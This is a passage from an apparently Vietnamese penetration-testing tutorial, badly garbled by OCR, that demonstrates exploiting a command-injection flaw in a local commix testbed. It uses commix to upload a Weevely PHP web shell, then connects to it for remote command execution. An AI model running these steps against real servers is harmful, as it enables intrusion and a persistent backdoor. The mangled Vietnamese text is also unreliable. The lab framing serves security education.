N u chúng ta thoát ra kh i nh t ký lỗi và chạy ls -l, chúng ta sẽ thấy rằng t mục thuộc sở hữu c a root. Mặc dù mình khơng khun bạn nên s dụng tài kho n root ể sở hữu t mục ứng dụn w n n tron tr ng hợp này, nó n ăn n t t i lên t p qua lỗ hổng command injection, vì v y ó l ều cần l u ý k n t k m p n pháp phòng th sau này Quyền có thể ón một vai trị trong vi n ăn ặn các cuộc tấn ôn n n n ũn không nên là bi n pháp b o v duy nhất.
H y t y ổi các quyền n y ể chúng ta có thể th c hi n vi c t i t p lên v i câu l nh:
68
chown -R www-data:www-data commix-testbed Bây gi , hãy chạy lại cuộc tấn công c a chúng ta:
python3 commix.py --url="http://127.0.0.1:3000/commix-
testbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" --file- upload="/home/kali/Documents/weevely.php" --file-
dest="/var/www/example.com/public_html/commix- testbed/scenarios/regular/GET/"
Và chúng ta sẽ ạt ợc mụ í k t ôn o n y n lên: [info] The /var/www/example.com/public_html/commix-
testbed/scenarios/regular/GET/weevely.php file was uploaded successfully! C n t t i tác nhân backdoor c a mình lên máy ch và chúng ta có thể xác minh bằng Pseudo-terminal:
ls weevely.php
Bước 3: Kết nối với tác nhân backdoor
Sau khi t i lên tác nhân backdoor, chúng ta có thể th c thi t p l nh bằng Weevely từ h th ng c a mình:
weevely http://127.0.0.1:3000//commix-
testbed/scenarios/regular/GET/weevely.php commix
69